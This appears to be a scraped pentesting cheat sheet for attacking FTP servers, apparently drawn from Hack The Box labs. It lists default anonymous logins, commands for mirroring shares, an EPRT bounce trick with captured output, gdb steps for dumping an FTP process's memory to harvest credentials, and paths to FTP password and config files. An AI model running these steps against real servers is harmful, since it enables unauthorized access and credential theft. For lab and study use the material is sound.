Copy nc -vn < I P > 21
openssl s_client -connect somesite.com:21 -starttls ftp
Copy anonymous : anonymous
anonymous :
ftp : ftp
Copy wget -m ftp://anonymous:anonymous@10.10.10.98
wget -m --no-passive ftp://anonymous:anonymous@10.10.10.98
Copy EPRT | 1 | 132.235.1.2 | 6275 |
EPRT | 2 | 1080::8:800:200C:417A | 5282 |
Copy $ telnet zetta.htb 21
220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
USER 6 OJCaGVYOJKtY3zFFQUTmtZNl8BHEuq5
331 User 6 OJCaGVYOJKtY3zFFQUTmtZNl8BHEuq5 OK. Password required
PASS 6 OJCaGVYOJKtY3zFFQUTmtZNl8BHEuq5
EPRT | 2 | dead:beef:2::1008 | 4488 | // my IPv6 address
200-FXP transfer: from 10.10 .14.10 to dead:beef:2::1008%160
200 PORT command successful
LIST
425 Could not open data connection to port 4488 : Connection refused
Copy $ tcpdump -i tun0 -vv ip6
tcpdump: listening on tun0, link-type RAW (Raw IP ), capture size 262144 bytes
09:12:32.613603 IP6 (flowlabel 0x6bdb7, hlim 63, next-header TCP (6) payload length: 40) dead:beef::250:56ff:feb9:df29.37250 > kali.4488: Flags [S], cksum 0x64d3 (correct), seq 1305187145, win 28800, options [mss 1337,sackOK,TS val 374756922 ecr 0,nop,wscale 7], length 0
09:12:32.613626 IP6 (flowlabel 0xbe7b8, hlim 64, next-header TCP (6) payload length: 20) kali.4488 > dead:beef::250:56ff:feb9:df29.37250: Flags [R.], cksum 0xa938 (correct), seq 0, ack 1305187146, win 0, length 0 Attach to FTP process and dump it's memory, in hope of finding credentials.
Copy $ gdb -p < FTP_PROCESS_PI D >
( gdb ) info proc mappings
( gdb ) q
( gdb ) dump memory /tmp/ < name > .mem < START_HEAD > < END_HEAD >
( gdb ) q
$ strings /tmp/ < nam e > .mem
// Alternative to 'info proc mappings' to get heap start-end address
( gdb ) ! grep heap /proc/ < PI D > /maps
Copy /etc/ftpusers
/etc/ftpd.conf
/etc/proftpd.conf
/etc/proftpd/proftpd.conf
/etc/proftpd/ftpd.passwd
/etc/vsftpd.conf
/etc/vsftpd/ftpusers
/etc/vsftpd/user_list 